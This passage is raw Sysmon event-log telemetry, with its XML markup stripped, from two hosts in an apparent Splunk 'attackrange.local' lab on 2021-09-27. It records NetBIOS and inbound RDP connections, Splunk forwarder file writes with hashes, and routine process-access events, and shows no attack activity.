AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.15win-host-542.attackrange.local138netbios-dgm 354300x8000000000000000978792Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:30.376{69CF5F33-7F0C-614D-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-542.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 10341000x80000000000000001050123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:33.753{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:33.269{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84141E70E6FFEF3A4B2B94B4C00B239,SHA256=F652279EF46531BAEFDA6A4D77E78594426AB8D97A3045FF8C94B26CEE036591,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:30.862{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54694-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978794Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:34.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1B93D5FAE8BD406F80245A7685102ED,SHA256=F7167D9A751F9A6334F8ADC3F9E3AB3F86C82AE08719CBC8D72403D778973259,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:34.284{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D867ED15CA8EECF43AFF3A0BD88F101,SHA256=517CFFB54F029C13EC84D3B9C5E28298CCCDFD95274299EEC38F72635750200C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:35.302{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108D66CDC62ED20FC5F4AD6028BB3117,SHA256=16703A51F4A39D6DFE68FAECA1D881AB90E083A624E0332DFA253D173F18FD07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978796Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:32.732{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59382-false10.0.1.12-8000- 23542300x8000000000000000978795Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:35.120{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C80809AFF5102526D9F40107313B9344,SHA256=9604E4A31509FDA2D15840B7F479EB4B8BB87AA7310AAF8E8905F0EADB1DC55E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:36.635{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:36.320{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30959819D3CBF2F798B9E649E7227BE7,SHA256=D759008EA828C7591FEF17C2F51463C7B6BDEF62F2005ECA8B3C9F255E4C047E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978797Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:36.152{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=926D15E0E4FFB06E9AB3703AD0587126,SHA256=917DA362EB50CB3072F15F27E5D15A102EDF04A7B4997ADA341A84D8E3950132,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:33.813{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53363-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:37.350{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937F5FCDBED432A787BC65EEE357F686,SHA256=B5AF546FF35BFFA3D84A54CBF2D1C6C0A51EE6C2438E5276E5AF0706FB4BE589,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978814Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.464{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AC9-6151-C679-00000000FD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978813Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978812Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978811Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978810Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978809Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978808Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978807Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978806Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978805Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978804Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8AC9-6151-C679-00000000FD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978803Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.449{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AC9-6151-C679-00000000FD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978802Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.418{69CF5F33-8AC9-6151-C679-00000000FD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978801Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:34.240{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-56505-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978800Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D138716EA4CA2F1F2EF673272C040873,SHA256=99579580A579327FDBBB77C8CA61582B5A54FE1C7BA2DC42A321C80E75C22C0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978799Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.058{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA0E29CF4D63724C506DC57C535231EE,SHA256=6131A208F2AEB446435C8EE3ADD5083DBE28F15096A19EFB507626A93D1586D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978798Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.058{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D71D5CFDBBFD22A349EC7D664EFF6F8D,SHA256=7DD5C54B9ECCCD8DEF909CF07360765005CCC2994512B22263FE93506A633DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:38.350{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9AAA15346713F3BBD060F20DDAA2C97,SHA256=AFB96BC193A12F3C50EE1D910DD85CA7FD8B1B004F06797D85F7312B9C12FE04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978817Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:38.433{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA0E29CF4D63724C506DC57C535231EE,SHA256=6131A208F2AEB446435C8EE3ADD5083DBE28F15096A19EFB507626A93D1586D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978816Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:35.154{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58876-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978815Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:38.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1BB71F962F527BAB9BB252B442D973,SHA256=757CB6B814713A2FF39991BEA5F3CE09C7CF947CA8941D5DE1004BF000AC8523,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:36.311{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53364-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000978818Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:39.480{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39502AEA61451B48244ABEF0A4E6B25E,SHA256=98E4D81A6DAA7ACF5C8C903F66A3B1973F5E9DC65209C9CDDE0873BDC85B1C84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:39.366{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5054D26569CC7D82579C7A25B2D1CAE,SHA256=1052A62A6B912A8AE99381CB718EAC56CF682D6C3892E007E7A12368BB78349A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:39.266{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B057ACF9247E625790D768CBF95A814D,SHA256=B0A1E5A3572E0F65B9AC422A4EC852B81B05B1153DB451C9CE59E4F517C6D84D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:40.367{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026C1CD08534EF0FB4D8D0B63FE2DACB,SHA256=0E086C96B81758DA8B1D7F9531155A62CDC4DDB78346B417DFA63576194476E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978821Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.872{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program 